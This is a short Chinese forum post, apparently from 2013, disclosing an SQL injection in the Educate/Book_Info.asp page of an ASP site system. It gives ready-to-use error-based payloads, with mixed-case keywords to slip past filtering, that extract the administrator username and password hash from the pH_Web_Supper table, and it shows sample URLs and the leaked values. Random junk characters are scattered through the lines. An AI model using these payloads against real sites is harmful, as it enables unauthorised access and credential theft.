漏洞出现在Educate/Book_Info.asp
1 K) `* i' u) P! i& |9 ? % a3 s) P( W$ G$ f9 T
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
: B: g% K: e! M * s; y- _! t [# V1 X
exp:如下
8 l& u" L+ r: _7 p查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 u' w6 F/ p |& g查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 h$ ~: U2 S' m1 {$ r% E
9 ]1 e, g& Q }
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 y7 H% G9 D/ g- V6 c: p V
) H1 S$ F( E! N' e9 ?$ J" SMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'8 A7 S: i8 p9 h& d: t9 q
& S7 f j1 w# k
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。, n* }: K, [2 ~& w: K2 K: I% f
8 g. j# b) p8 U W, s; o
/Educate/Book_Info.asp,行 8# `) [; a m' D* S
3 z3 Q1 T* c& W$ K( X( B5 \ u* P# Ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ j7 r `& |$ ?( b1 x
, j. s4 a8 v& [! ?% q" TMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
1 \4 O: H, f1 M9 J' E
% m+ m, e$ E; M& i1 d- |& [/ I将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。, C9 ?1 M- s1 J
. Y; `0 p- r Z2 i1 e3 S3 P/Educate/Book_Info.asp,行 8
# h( C; U$ {2 S1 i0 ]. b" e$ B+ o {3 z2 d |
发表于 2013-2-16 21:44:16
收藏
支持
反对